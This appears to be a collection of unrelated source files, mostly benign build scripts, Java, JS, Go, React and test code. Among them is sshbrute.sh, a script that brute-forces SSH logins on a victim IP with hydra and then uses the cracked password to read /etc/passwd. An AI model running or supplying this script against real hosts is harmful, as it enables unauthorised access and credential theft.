install_framework "${BUILT_PRODUCTS_DIR}/AlamofireObjectMapper/AlamofireObjectMapper.framework"
install_framework "${BUILT_PRODUCTS_DIR}/Kingfisher/Kingfisher.framework"
install_framework "${BUILT_PRODUCTS_DIR}/ObjectMapper/ObjectMapper.framework"
fi
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
wait
fi
|
#!/usr/bin/env bash
set -x
# outputs
output_dir="s3.bcf-base-image-ubuntu-version"
mkdir -p ${output_dir}
BASE_IMAGE_VERSION=`cat git.bosh-linux-stemcell-builder/bosh-stemcell/image-metalinks/ubuntu-${UBUNTU_REL}.meta4 | grep -E "<url>|versionId=" | sed -e "s/.*versionId=//;s/<\/url>.*//"`
BASE_IMAGE_VERSION_SHORT=${BASE_IMAGE_VERSION:1:7}
# Check if the given base image with specific tag already exists
TOKEN=$( curl -sSLd "username=${DOCKER_USER}&password=${DOCKER_PASS}" https://hub.docker.com/v2/users/login | jq -r ".token" )
curl -sH "Authorization: JWT $TOKEN" "https://hub.docker.com/v2/repositories/${DOCKER_REPO}/tags/${BASE_IMAGE_VERSION_SHORT}/" | grep "Not found"
if [ $? -ne 0 ]; then
echo "The base-image with tag ${BASE_IMAGE_VERSION_SHORT} already exists, ignore image creation."
exit 1
else
echo "The base-image with tag ${BASE_IMAGE_VERSION_SHORT} does not exist, generate the version for subsequent image creation."
echo "${BASE_IMAGE_VERSION_SHORT}" > s3.bcf-base-image-ubuntu-version/bcf-base-image-ubuntu-${UBUNTU_REL}-version
fi |
package sentry
import "strings"
// ErrType represents an error which may contain hierarchical error information.
type ErrType string
// IsInstance will tell you whether a given error is an instance
// of this ErrType
func (e ErrType) IsInstance(err error) bool {
return strings.Contains(err.Error(), string(e))
}
// Unwrap will unwrap this error and return the underlying error which caused
// it to be triggered.
func (e ErrType) Unwrap() error {
return nil
}
// Error gets the error message for this ErrType
func (e ErrType) Error() string {
return string(e)
}
|
'use strict';
exports.__esModule = true;
exports.xcodeprojLoader = exports.nibLoader = exports.commandResourceLoader = undefined;
var _path = require('path');
var _path2 = _interopRequireDefault(_path);
function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; }
const WEBPACK_DIRECTORY = '_webpack_resources';
const resourceRegex = /^(?!.*\.(jsx?|tsx?|json|nib|xib|framework|xcodeproj|xcworkspace|xcworkspacedata|pbxproj)$).*/; // match everything except .jsx?, .tsx?, json, xib and nib
const commandResourceLoader = exports.commandResourceLoader = {
test: resourceRegex,
use: {
loader: '@skpm/file-loader',
query: {
raw: true,
outputPath(url) {
return _path2.default.posix.join('..', 'Resources', WEBPACK_DIRECTORY, url);
},
publicPath(url) {
return `"file://" + String(context.scriptPath).split(".sketchplugin/Contents/Sketch")[0] + ".sketchplugin/Contents/Resources/${WEBPACK_DIRECTORY}/${url}"`;
}
}
}
};
const nibRegex = /\.(nib|xib)?$/; // match xib or nib
const nibLoader = exports.nibLoader = {
test: nibRegex,
use: {
loader: '@skpm/nib-loader',
query: {
raw: true,
outputPath(url) {
return _path2.default.posix.join('..', 'Resources', WEBPACK_DIRECTORY, url);
},
publicPath(url) {
return `${WEBPACK_DIRECTORY}/${url}`;
}
}
}
};
const xcodeprojRegex = /\.(framework|xcodeproj|xcworkspace|xcworkspacedata|pbxproj)?$/; // match xcodeproj
const xcodeprojLoader = exports.xcodeprojLoader = {
test: xcodeprojRegex,
use: {
loader: '@skpm/xcodeproj-loader',
query: {
raw: true,
outputPath(url) {
return _path2.default.posix.join('..', 'Resources', WEBPACK_DIRECTORY, url);
},
publicPath(url) {
return `${WEBPACK_DIRECTORY}/${url}`;
}
}
}
}; |
#!/bin/bash
dieharder -d 203 -g 7 -S 2493541151
|
#!/bin/bash
if [ $# != 1 ]
then
echo "Arg 1 must be an environment (host list etc.....)"
exit
else
SERVER=$1
echo "$SERVER"
fi
for i in `cat $SERVER`
do
echo $i
echo
scp -rp dis_rservices.sh dis_services $i:
ssh $i -C " sh dis_rservices.sh "
ssh $i -C " chkconfig | grep 3:on "
ssh $i -C " /bin/rm /root/dis_rservices.sh dis_services "
ssh $i -C " reboot "
done
|
<reponame>JLLeitschuh/datasift-java<gh_stars>10-100
package com.datasift.client.pylon;
import com.datasift.client.DataSiftApiClient;
import com.datasift.client.DataSiftConfig;
import com.datasift.client.FutureData;
import com.datasift.client.ParamBuilder;
import com.fasterxml.jackson.core.JsonProcessingException;
import io.higgs.http.client.JSONRequest;
import io.higgs.http.client.Request;
import io.higgs.http.client.readers.PageReader;
import java.net.URI;
/*
* This class provides access to the DataSift Analysis Task API.
*/
public class DataSiftPylonTask extends DataSiftApiClient {
protected static final String service = "linkedin";
public final String TASK = "pylon/linkedin/task/";
public DataSiftPylonTask(DataSiftConfig config) {
super(config);
}
public FutureData<PylonTaskResultList> get(int page, int perPage) {
FutureData<PylonTaskResultList> future = new FutureData<>();
ParamBuilder b = new ParamBuilder();
if (page > 0) {
b.put("page", page);
}
if (perPage > 0) {
b.put("per_page", perPage);
}
URI uri = b.forURL(config.newAPIEndpointURI(TASK));
Request request = config.http().GET(uri,
new PageReader(newRequestCallback(future, new PylonTaskResultList(), config)));
performRequest(future, request);
return future;
}
public FutureData<PylonTaskResult> get(String id) {
URI uri = newParams().forURL(config.newAPIEndpointURI(TASK + id));
FutureData<PylonTaskResult> future = new FutureData<>();
Request request = config.http().GET(uri,
new PageReader(newRequestCallback(future, new PylonTaskResult(), config)));
performRequest(future, request);
return future;
}
public FutureData<PylonTaskAnalyzeResponse> analyze(PylonTaskRequest query) {
if (query == null) {
throw new IllegalArgumentException("A valid analyze request body is required to analyze a stream");
}
FutureData<PylonTaskAnalyzeResponse> future = new FutureData<PylonTaskAnalyzeResponse>();
URI uri = newParams().forURL(config.newAPIEndpointURI(TASK));
try {
JSONRequest result = config.http()
.postJSON(uri, new PageReader(newRequestCallback(future, new PylonTaskAnalyzeResponse(), config)))
.setData(query);
performRequest(future, result);
} catch (JsonProcessingException ex) {
throw new IllegalArgumentException("Valid JSON is required to analyze a stream");
}
return future;
}
}
|
package com.cupshe.restclient.lang;
import java.lang.annotation.*;
/**
* HttpsSupported
* <p>Marking this annotation will send an HTTPS request.
*
* @author zxy
*/
@Target({ElementType.TYPE, ElementType.METHOD})
@Retention(RetentionPolicy.RUNTIME)
@Documented
public @interface HttpsSupported {
//---------------------
// EMPTY BODY
//---------------------
}
|
<reponame>RiyaGupta89/project-zone
import React,{useState} from 'react';
import { useDataLayerValues } from "../../datalayer";
import { ToastContainer, toast } from 'react-toastify';
import { sendmessage } from './../../axios/instance';
import ParticlesBg from 'particles-bg';
import './contactus.css';
export default function ContactUs() {
const [{ user }, dispatch] = useDataLayerValues();
const [fields, setFields] = useState({
fullname: `${user.fname} ${user.lname}`,
email: user.email,
message:" "
});
const { fullname, email, message } = fields;
const handleChange = (e) => {
const { name, value } = e.target;
setFields((prevState) => {
return {
...prevState,
[name]: value,
};
});
};
const handleSubmit = async (e) =>
{
e.preventDefault();
const emailTest = /^[^\s@]+@[^\s@]+\.[^\s@]{2,}$/i;
if (!fullname){
toast.error("Please enter your Full Name");
} else if (email.trim() === " "){
toast.error("Please enter your email");
} else if (!emailTest.test(email)) {
toast.error('Please enter a valid email');
} else if (!message) {
toast.error('Please write a message/feedback to connect with us');
} else{
sendMessage(fullname, email, message);
clearFields();
}
};
const sendMessage = async (fullname, email, message) => {
const body = {
fullname: fullname,
email: email,
message:message
};
try {
const res = await sendmessage(body);
if (!res.data.error && res.data.success) {
toast.success(`Message sent successfully ! Check your mailbox to find response sent by us`);
}
} catch (err) {
if (err.response) {
toast.error(`${err.response.data.error}`);
}
}
}
const clearFields = () => {
setFields({
message:" "
});
};
return (
<section className = "contact_section" >
<ParticlesBg type = "coweb"
bg = {true}
/>
<div className = "contact__left" >
</div>
<div className = "contact__right" >
<ToastContainer position="bottom-right" />
<form onSubmit={handleSubmit}>
<div className = "inputBox" >
<label className = "label" > Full Name </label>
<input type = "text"
name = "fullname"
value={fullname}
onChange={handleChange}
className = "contact__input"
placeholder = "E.g. <NAME>"
required />
</div>
<div className = "inputBox" >
<label className = "label" > Email </label>
<input type = "email"
name = "email"
value={email}
onChange={handleChange}
className = "contact__input"
placeholder = "e.g <EMAIL>"
required />
</div>
<div className = "inputBox">
<label className = "label"> Message </label>
<textarea
name = "message"
value={ message }
onChange={handleChange}
className = "contact__textarea"
placeholder = "Message"
rows = "3"
required />
</div>
<button type="submit" className = "submitBtn"><span> Send </span></button>
</form>
</div>
</section>
)
} |
<filename>spec/specs.js
describe("Ticket",function(){
it("creates a ticket that specifies movie title, time, and user's age based on input", function() {
var testTicket = new Ticket("Trainspotting", "5:00", 34, 1)
expect(testTicket.titlee).to.equal("Trainspotting");
expect(testTicket.time).to.equal("5:00");
expect(testTicket.age).to.equal(34);
expect(testTicket.quantity).to.equal(1)
});
it("creates ticket that calculates twenty percent price discount if user age is over 65",function() {
var testTicket = new Ticket("Trainspotting", "5:00", 70, 1)
expect(testTicket.price()).to.equal(8);
});
it("creates ticket that calculates twenty percent price discount if user attends before 4:00",function() {
var testTicket = new Ticket("Trainspotting", "2:00", 34, 1)
expect(testTicket.price()).to.equal(8);
});
it("creates ticket that calculates twenty percent price discount if user attends older movie",function() {
var testTicket = new Ticket("12 Angry Men", "5:00", 34, 1)
expect(testTicket.price()).to.equal(8);
});
it("creates ticket that calculates total price based on quantity",function() {
var testTicket = new Ticket("12 Angry Men", "5:00", 34, 2)
expect(testTicket.price()).to.equal(16);
});
});
|
package junit;
import static org.junit.jupiter.api.Assertions.*;
import java.util.Random;
import org.junit.jupiter.api.Test;
import main.MyString1;
/**
* @author <NAME>
*
*/
public class MyString1Test
{
Random random = new Random();
final char[] myString = {'J', 'a', 'v', 'a'};
final MyString1 myString1 = new MyString1(myString);
/**
* Test method for {@link main.MyString1#charAt(int)} with a valid index.
*/
@Test
public void testCharAtWithAValidIndex()
{
if (myString1.length() > 0)
{
int randomIndex = random.nextInt(myString1.length());
assertEquals(myString[randomIndex], myString1.charAt(randomIndex));
}
}
/**
* Test method for {@link main.MyString1#charAt(int)} with invalid indices.
*/
@Test
public void testCharAtWithInvalidIndices()
{
assertEquals('\u0000', myString1.charAt(-1));
assertEquals('\u0000', myString1.charAt(myString1.length()));
}
/**
* Test method for {@link main.MyString1#equals(main.MyString1)} with equal and unequal strings.
*/
@Test
public void testEqualsMyString1WithEqualAndUnequalStrings()
{
MyString1 myString2 = new MyString1(myString);
assertTrue(myString1.equals(myString2));
char[] differentSizeString = {'S', 'c', 'a', 'l', 'a'};
MyString1 differentSizeString1 = new MyString1(differentSizeString);
assertFalse(myString1.equals(differentSizeString1));
}
/**
* Test method for {@link main.MyString1#equals(main.MyString1)} with lowercased string.
*/
@Test
public void testEqualsMyString1WithLowercasedString()
{
MyString1 lowerCaseString = myString1.toLowerCase();
if (myString1.length() > 0)
{
assertFalse(myString1.equals(lowerCaseString));
}
else
{
assertTrue(myString1.equals(lowerCaseString));
}
}
/**
* Test method for {@link main.MyString1#substring(int, int)} with valid beginning and ending indices.
*/
@Test
public void testSubstringWithValidBeginEndIndices()
{
if (myString1.length() > 0)
{
int randomBeginIndex = random.nextInt(myString1.length());
MyString1 someSubstring = myString1.substring(randomBeginIndex, myString1.length());
char[] expected = String.valueOf(myString).substring(randomBeginIndex, myString.length).toCharArray();
assertTrue(someSubstring.equals(new MyString1(expected)));
}
assertTrue(myString1.equals(myString1.substring(0, myString1.length())));
}
/**
* Test method for {@link main.MyString1#substring(int, int)} with invalid beginning and ending indices.
*/
@Test
public void testSubstringWithInvalidBeginEndIndices()
{
assertTrue(myString1.equals(myString1.substring(0, myString1.length() + 2)));
assertTrue(myString1.equals(myString1.substring(myString1.length(), myString1.length() + 2)));
assertTrue(myString1.equals(myString1.substring(2, 1)));
assertTrue(myString1.equals(myString1.substring(myString1.length(), myString1.length())));
assertTrue(myString1.equals(myString1.substring(myString1.length() + 5, myString1.length() + 2)));
assertTrue(myString1.equals(myString1.substring(-5, myString1.length())));
assertTrue(myString1.equals(myString1.substring(-5, myString1.length() + 2)));
assertTrue(myString1.equals(myString1.substring(-2, -5)));
}
/**
* Test method for {@link main.MyString1#toLowerCase()}.
*/
@Test
public void testToLowerCase()
{
MyString1 lowerCaseString = myString1.toLowerCase();
String expected = String.valueOf(myString).toLowerCase();
for (int index = 0; index < lowerCaseString.length(); index++)
{
assertEquals(expected.charAt(index), lowerCaseString.charAt(index));
}
}
/**
* Test method for {@link main.MyString1#valueOf(int)} with a random integer.
*/
@Test
public void testValueOfWithRandomInteger()
{
int randomInteger = random.nextInt();
MyString1 randomIntegerString = MyString1.valueOf(randomInteger);
String expectedRandomIntegerString = String.valueOf(randomInteger);
for (int index = 0; index < randomIntegerString.length(); index++)
{
assertEquals(expectedRandomIntegerString.charAt(index), randomIntegerString.charAt(index));
}
}
/**
* Test method for {@link main.MyString1#valueOf(int)} with positive and negative digits.
*/
@Test
public void testValueOfWithPostiveAndNegativeDigits()
{
int randomDigit = random.nextInt(10);
assertEquals((char) (randomDigit + '0'), MyString1.valueOf(randomDigit).charAt(0));
MyString1 randomNegativeDigitString = MyString1.valueOf(-randomDigit);
String expectedRandomNegativeDigitString = String.valueOf(-randomDigit);
for (int index = 0; index < randomNegativeDigitString.length(); index++)
{
assertEquals(expectedRandomNegativeDigitString.charAt(index), randomNegativeDigitString.charAt(index));
}
}
} |
package data.objects;
import engine.CONST;
import javafx.beans.property.SimpleIntegerProperty;
import javafx.beans.property.SimpleStringProperty;
public class Activity {
/* Highest ID loaded in the memory */
private static int highestID = -1;
private static boolean highestIDEnabled = false;
private int id;
private int order;
private String name;
private SimpleStringProperty nameProperty;
private SimpleIntegerProperty idProperty;
public Activity(String name) {
this(highestID + 1, name);
}
public Activity(int id, String name) {
this.id = id;
this.name = name;
/* update highestID */
if (id > highestID) {
highestID = id;
} else if (highestIDEnabled == true){
this.id = ++highestID;
}
nameProperty = new SimpleStringProperty();
idProperty = new SimpleIntegerProperty();
}
public static void resetID() {
highestID = -1;
}
public boolean equals(Activity act) {
return (act.getId() == this.getId());
}
public static void disableHighestID() {
highestIDEnabled = false;
}
public static void enableHighestID() {
highestIDEnabled = true;
}
public static void resetHighestID() {
highestID = CONST.DEFAULT_HIGHEST_ID;
}
public String toString() {
return name;
}
/* **************************** */
/* */
/* GETTERS/SETTERS */
/* */
/* **************************** */
public static int getHighestId() {
return highestID;
}
public String getName() {
return name;
}
public int getId() {
return id;
}
public void setName(String name) {
this.name = name;
}
public int getOrder() {
return order;
}
public void setOrder(int order) {
this.order = order;
}
public SimpleIntegerProperty idProperty() {
idProperty.set(id);
return idProperty;
}
public SimpleStringProperty nameProperty() {
nameProperty.set(name);
return nameProperty;
}
}
|
SELECT jobtitle, AVG(salary)
FROM table
GROUP BY jobtitle; |
import cPickle
model=cPickle.load(open('lstm_tanh_relu_[1468202263.38]_2_0.610.p'))
cPickle.dump(model,open('model.bin.nlg','wb')) |
#!/bin/bash
# this script is ment to run all possible modes of SPM/SPMT with the
# interpreter passed to this script to check if they (at least) do not trow
# some runtime exception, poor man test-suite. SPM/SPMT do not have to be
# installed but their runtime dependencies must be. if it fails it does no
# cleanup! all short arguments are used instead of shortcuts (such as
# -a/--automake) on purpose as the tests are selective due to some restrictions
# and in addition it ensures that on arguments change the tests fail.
set -e
uid="$(id -u)"
curdir="$(dirname $0)"
rootdir="$curdir/root-$1"
cachedir="$rootdir/cache"
builddir="$rootdir/build"
spmargs="--root $rootdir --cache $cachedir --build $builddir --missing=True --notify=True --scripts=False --permissions=True --debug"
spmtargs="--root $rootdir --debug"
statefile="$rootdir/testrun-$1"
case "$1" in
*python*) true ;;
*) echo "Invalid interpreter: $1"
exit 1 ;;
esac
expectedfailure() {
if [ "$?" != "$1" ];then
exit $?
fi
}
# to ensure that no stray files from previous run are left
make -C "$curdir" clean
mkdir -pv "$rootdir"
touch "$statefile"
# to avoid requirement of installing the libs
ln -svf "$curdir/../libs/libmessage.py" .
ln -svf "$curdir/../libs/libmisc.py" .
ln -svf "$curdir/../libs/libpackage.py" .
if ! grep -q "SPM REPO" "$statefile" ;then
echo "=== RUNNING SPM REPO TEST ==="
"$1" "$curdir/spm.py" $spmargs repo -cspu
echo "SPM REPO" >> "$statefile"
else
echo "=== SKIPPING SPM REPO TEST ==="
fi
if ! grep -q "SPM REMOTE" "$statefile" ;then
echo "=== RUNNING SPM REMOTE TEST ==="
"$1" "$curdir/spm.py" $spmargs remote -pnvrdDOmcsob ca-certificates
echo "SPM REMOTE" >> "$statefile"
else
echo "=== SKIPPING SPM REMOTE TEST ==="
fi
if ! grep -q "SPM SOURCE" "$statefile" ;then
echo "=== RUNNING SPM SOURCE TEST ==="
# --depends, --reverse and --remove are not tested!
"$1" "$curdir/spm.py" $spmargs source -Cfpckim ca-certificates
echo "SPM SOURCE" >> "$statefile"
else
echo "=== SKIPPING SPM SOURCE TEST ==="
fi
if ! grep -q "SPM LOCAL" "$statefile" ;then
echo "=== RUNNING SPM LOCAL TEST ==="
"$1" "$curdir/spm.py" $spmargs local -pnvRdDOArsf ca-certificates
echo "SPM LOCAL" >> "$statefile"
else
echo "=== SKIPPING SPM LOCAL TEST ==="
fi
if ! grep -q "SPM WHO" "$statefile" ;then
echo "=== RUNNING SPM WHO TEST ==="
"$1" "$curdir/spm.py" $spmargs who -p ca-certificates
echo "SPM WHO" >> "$statefile"
else
echo "=== SKIPPING SPM WHO TEST ==="
fi
if [ "$uid" != "0" ];then
echo "=== SKIPPING SPMT DIST TEST (REQUIRES ROOT) ==="
elif ! grep -q "SPMT DIST" "$statefile" ;then
echo "=== RUNNING SPMT DIST TEST (ROOT) ==="
"$1" "$curdir/tools.py" $spmtargs dist -scd "$rootdir" ca-certificates
echo "SPMT DIST" >> "$statefile"
else
echo "=== SKIPPING SPMT DIST TEST (ROOT) ==="
fi
if ! grep -q "SPMT CHECK" "$statefile" ;then
echo "=== RUNNING SPMT CHECK TEST ==="
# --depends and --reverse are not tested!
"$1" "$curdir/tools.py" $spmtargs check ca-certificates || expectedfailure 2
echo "SPMT CHECK" >> "$statefile"
else
echo "=== SKIPPING SPMT CHECK TEST ==="
fi
if ! grep -q "SPMT CLEAN" "$statefile" ;then
echo "=== RUNNING SPMT CLEAN TEST ==="
"$1" "$curdir/tools.py" $spmtargs clean
echo "SPMT CLEAN" >> "$statefile"
else
echo "=== SKIPPING SPMT CLEAN TEST ==="
fi
if ! grep -q "SPMT LINT" "$statefile" ;then
echo "=== RUNNING SPMT LINT TEST ==="
"$1" "$curdir/tools.py" $spmtargs lint -musPMfboepnkc ca-certificates
echo "SPMT LINT" >> "$statefile"
else
echo "=== SKIPPING SPMT LINT TEST ==="
fi
if ! grep -q "SPMT SANE" "$statefile" ;then
echo "=== RUNNING SPMT SANE TEST ==="
"$1" "$curdir/tools.py" $spmtargs sane -ednmNvtug ca-certificates
echo "SPMT SANE" >> "$statefile"
else
echo "=== SKIPPING SPMT SANE TEST ==="
fi
# TODO: merge, edit
if ! grep -q "SPMT WHICH" "$statefile" ;then
echo "=== RUNNING SPMT WHICH TEST ==="
"$1" "$curdir/tools.py" $spmtargs which -cp ca-certificates
echo "SPMT WHICH" >> "$statefile"
else
echo "=== SKIPPING SPMT WHICH TEST ==="
fi
if [ "$uid" != "0" ];then
echo "=== SKIPPING SPMT PACK TEST (REQUIRES ROOT) ==="
elif [ ! -d "$rootdir/var/local/spm/ca-certificates" ];then
echo "=== SKIPPING SPMT PACK TEST (CA-CERTIFICATES NOT INSTALLED) ==="
elif ! grep -q "SPMT PACK" "$statefile" ;then
echo "=== RUNNING SPMT PACK TEST ==="
"$1" "$curdir/tools.py" $spmtargs pack -d "$rootdir" ca-certificates
echo "SPMT PACK" >> "$statefile"
else
echo "=== SKIPPING SPMT PACK TEST ==="
fi
# serve is a blocking and dengerous to run
if ! grep -q "SPMT DISOWNED" "$statefile" ;then
echo "=== RUNNING SPMT DISOWNED TEST ==="
"$1" "$curdir/tools.py" $spmtargs disowned -cpd "$rootdir"
echo "SPMT DISOWNED" >> "$statefile"
else
echo "=== SKIPPING SPMT DISOWNED TEST ==="
fi
|
#!/bin/bash
if [[ $# -lt 2 ]]; then
echo "Usage ./sshbrute.sh <IP> <ETHSPLOITER_PATH>"
exit 1
fi
VICTIM_IP=$1
ETHSPLOITER_PATH=$2
HYDRA_OUT=/tmp/hydra_out
hydra -L $ETHSPLOITER_PATH/exploits/multi/ssh/login/user -P $ETHSPLOITER_PATH/exploits/multi/ssh/login/pass ssh://$VICTIM_IP -o $HYDRA_OUT
PASS_FOUND=`cat $HYDRA_OUT | wc -l`
if [[ $PASS_FOUND -eq 1 ]]; then
echo "Couldn't log into ssh with login:pass dict"
exit 1
fi
line=`tail $HYDRA_OUT -n 1`
HOST="`echo $line | sed 's/^.*host: \(.*\)\s\+login: .*$/\1/g'`"
USER="`echo $line | sed 's/^.*login: \(.*\)\s\+password: .*$/\1/g'`"
PASS="`echo $line | sed 's/^.*password: \(.*\)$/\1/g'`"
echo "Cracked: host=$VICTIM_IP user=$USER pass=$PASS"
# ------------------------------------------------------------------------
# DO STH BAD, YOU HAVE ACCESS TO THE SHELL
# ------------------------------------------------------------------------
echo "Executing bad script on $HOST"
sshpass -p $PASS ssh $USER@$VICTIM_IP "cat /etc/passwd"
# expect -c 'spawn ssh '$USER'@'$VICTIM_IP' "cat /etc/passwd"; expect "assword:"; send "'$PASS'\r"; interact'
|
/**
* Copyright 2014 Transmode AB
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package se.transmode.gradle.plugins.docker.client;
import java.io.File;
import java.util.List;
import java.util.Map;
public interface DockerClient {
/**
* Build a Docker image from the contents of the given directory.
*
* @param buildDir the directory from which to build the image
* @param tag the tag to apply to the image
* @param pull wether to pull latest image or not, true enables the pull, false disables pull
* @return the output of the command
*/
public String buildImage(File buildDir, String tag, boolean pull);
/**
* Push the given image to the configured Docker registry.
*
* @param tag the tag of the image to push
* @return the output of the command
*/
public String pushImage(String tag);
/**
* Run the given image in a container with the given name.
*
* @param tag the image to run
* @param containerName the name of the container to create
* @param detached should the container be run in the background (aka detached)
* @param autoRemove should the container be removed when execution completes
* @param env a map containing a collection of environment variables to set
* @param ports a map containing the ports to publish
* @param volumes a map containing the volumes to bind
* @param volumesFrom a list of the containers whose volumes we should mount
* @param links a list of the containers to which the newly created container should be linked
* @return the output of the command
*/
public String run(String tag, String containerName, boolean detached, boolean autoRemove,
Map<String, String> env, Map<String, String> ports, Map<String, String> volumes,
List<String> volumesFrom, List<String> links);
}
|
#!/usr/bin/env bash
#
# This script builds the application from source for multiple platforms.
set -e
export CGO_ENABLED=0
# Determine the Arch/OS combos we're building for
echo "==> Determining Arch/OS Info..."
XC_ARCH=${XC_ARCH:-"386 amd64 arm"}
XC_OS=${XC_OS:-"darwin freebsd linux"}
# Get Git Commit information
echo "==> Determining Git Info..."
GIT_COMMIT=$(git rev-parse HEAD)
GIT_DIRTY="$(test -n "$(git status --porcelain)" && echo "+CHANGES" || true)"
# LDFlags for Runtime Variables
LDFLAGS="-s -w"
LDFLAGS="$LDFLAGS -X main.Name=${NAME}"
LDFLAGS="$LDFLAGS -X main.Version=${VERSION}"
LDFLAGS="$LDFLAGS -X main.GitCommit=${GIT_COMMIT}${GIT_DIRTY}"
# Delete the old dir
echo "==> Removing old directory..."
rm -rf pkg/*
# Build!
echo "==> Building..."
"`which gox`" \
-os="${XC_OS}" \
-arch="${XC_ARCH}" \
-osarch="!darwin/arm" \
-ldflags "-X ${GIT_IMPORT}.GitCommit='${GIT_COMMIT}${GIT_DIRTY}' -X ${GIT_IMPORT}.GitDescribe='${GIT_DESCRIBE}'" \
-output "pkg/{{.OS}}-{{.Arch}}-replicator" \
-tags="${BUILD_TAGS}" \
.
|
#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail
# Generate route injection code.
OUTPUT_PKG="github.com/openshift-knative/knative-serving-networking-openshift/pkg/client/openshift/injection" \
VERSIONED_CLIENTSET_PKG="github.com/openshift/client-go/route/clientset/versioned" \
EXTERNAL_INFORMER_PKG="github.com/openshift/client-go/route/informers/externalversions" \
vendor/knative.dev/pkg/hack/generate-knative.sh "injection" \
github.com/openshift/client-go \
github.com/openshift/api \
"route:v1" \
--go-header-file hack/boilerplate.txt
# Generate maistra clients.
vendor/k8s.io/code-generator/generate-groups.sh "client,informer,lister" \
github.com/openshift-knative/knative-serving-networking-openshift/pkg/client/maistra \
github.com/maistra/istio-operator/pkg/apis \
"maistra:v1" \
--go-header-file hack/boilerplate.txt
# Generate maistra injection code.
OUTPUT_PKG="github.com/openshift-knative/knative-serving-networking-openshift/pkg/client/maistra/injection" \
vendor/knative.dev/pkg/hack/generate-knative.sh "injection" \
github.com/openshift-knative/knative-serving-networking-openshift/pkg/client/maistra \
github.com/maistra/istio-operator/pkg/apis \
"maistra:v1" \
--go-header-file hack/boilerplate.txt
hack/update-deps.sh |
function findMedian($arr_numbers)
{
sort($arr_numbers);
$totalElements = count($arr_numbers);
if ($totalElements % 2 == 0)
{
return ($arr_numbers[$totalElements / 2] +
$arr_numbers[$totalElements / 2 - 1]) / 2;
}
else
{
return $arr_numbers[$totalElements / 2];
}
} |
#!/bin/sh -l
set -e
module purge
source /etc/profile
source /etc/profile.d/modules.sh
module unload mpi.intel
module load gcc/7
module load mpi.ompi/2.0/gcc
#module load hdf5/mpi/1.8.17_gcc
# OMPI="/opt/rrzk/lib/openmpi/2.1.1/gcc/bin"
#
# export CC="${OMPI}/mpicc"
# export CXX="${OMPI}/mpicc"
# export FC="${OMPI}/mpifort"
# export F9X="${OMPI}/mpif90"
# export MPI_C_COMPILER="${OMPI}/mpicc"
# export MPI_CXX_COMPILER="${OMPI}/mpicc"
# export MPI_Fortran_COMPILER="${OMPI}/mpifort"
#
# export LD_LIBRARY_PATH="$LD_LIBRARY_PATH:/home/jmarker2/builds/bin/hdf5-1.10.1/lib"
exec "$@"
|
class PhotoInAlbum < ApplicationRecord
self.table_name = 'photos_in_albums'
belongs_to :photo, inverse_of: :photo_in_albums
belongs_to :album, inverse_of: :photo_in_albums
validates :photo, :album, presence: true
validates :photo, uniqueness: {scope: :album, message: "is already in this album"}
validates :display_order, presence: true, numericality: {only_integer: true, greater_than_or_equal_to: 0}
def self.get(album, photo)
PhotoInAlbum.find_by(album_id: album.id, photo_id: photo.id)
end
def position
@position ||= 1 + PhotoInAlbum.where(["album_id = ? AND display_order < ?", album_id, display_order]).count
end
def page
@page ||= (position / Photo.default_per_page.to_f).ceil
end
end
|
def normalize_lines(response_list):
# Normalize Lines - return (int)
lines = [s for s in response_list if "line" in s]
lines = [int(s) for s in str(lines).split() if s.isdigit()]
try:
lines = int(lines[0])
except IndexError:
lines = 0
return lines
def convert_to_bytes(size, size_type):
# Convert KB or MB for Bytes
if size_type == "KB":
return int(float(size) * 1000)
elif size_type == "MB":
return int(float(size) * 1000000)
def normalize_size(response_list):
# Normalize Size - return bytes (int)
response_list = str(response_list)
if "Bytes" in response_list:
size = response_list.split("Bytes")[0].split(" ")[-2]
size = int(size)
elif "KB" in response_list:
size = response_list.split("KB")[0].split(" ")[-2]
size = convert_to_bytes(size, "KB")
elif "MB" in response_list:
size = response_list.split("MB")[0].split(" ")[-2]
size = convert_to_bytes(size, "MB")
else:
size = 0
return size
def normalize_extension(dir_file):
from pathlib import Path
ext = Path(dir_file).suffix
if ext == "":
ext = "<others>"
return ext
|
<gh_stars>1-10
//https://www.hackerrank.com/challenges/candies
long d[100001];
long candies(int n, vector<int> arr)
{
d[0] = 1;
long sum = 0;
int count = 1;
//왼쪽 -> 오른쪽
for (int i = 1; i < n; i++)
{
if (arr[i] > arr[i - 1])
{
count++;
}
else if (arr[i] <= arr[i - 1])
{
count = 1;
}
d[i] = count;
}
count = 1;
//오른쪽 -> 왼쪽
for (int i = n - 2; i >= 0; i--)
{
if (arr[i] > arr[i + 1])
{
count++;
}
else if (arr[i] <= arr[i + 1])
{
count = 1;
}
d[i] = (count > d[i] ? count : d[i]);
}
for (int i = 0; i < n; i++)
{
sum += d[i];
}
return sum;
}
|
<gh_stars>10-100
package com.ulfy.master.ui.view;
import android.content.Context;
import android.util.AttributeSet;
import android.view.View;
import android.widget.TextView;
import com.ulfy.android.mvvm.IViewModel;
import com.ulfy.android.ui_injection.Layout;
import com.ulfy.android.ui_injection.ViewById;
import com.ulfy.android.ui_injection.ViewClick;
import com.ulfy.master.R;
import com.ulfy.master.application.vm.GuideVM;
import com.ulfy.master.ui.activity.Guide1Activity;
import com.ulfy.master.ui.activity.Guide2Activity;
import com.ulfy.master.ui.base.BaseView;
@Layout(id = R.layout.view_guide)
public class GuideView extends BaseView {
@ViewById(id = R.id.guide1TV) private TextView guide1TV;
@ViewById(id = R.id.guide2TV) private TextView guide2TV;
private GuideVM vm;
public GuideView(Context context) {
super(context);
init(context, null);
}
public GuideView(Context context, AttributeSet attrs) {
super(context, attrs);
init(context, attrs);
}
private void init(Context context, AttributeSet attrs) {
}
@Override public void bind(IViewModel model) {
vm = (GuideVM) model;
}
/**
* click: guide1TV
* 引导页1
*/
@ViewClick(ids = R.id.guide1TV) private void guide1TV(View v) {
Guide1Activity.startActivity();
}
/**
* click: guide2TV
* 引导页2
*/
@ViewClick(ids = R.id.guide2TV) private void guide2TV(View v) {
Guide2Activity.startActivity();
}
} |
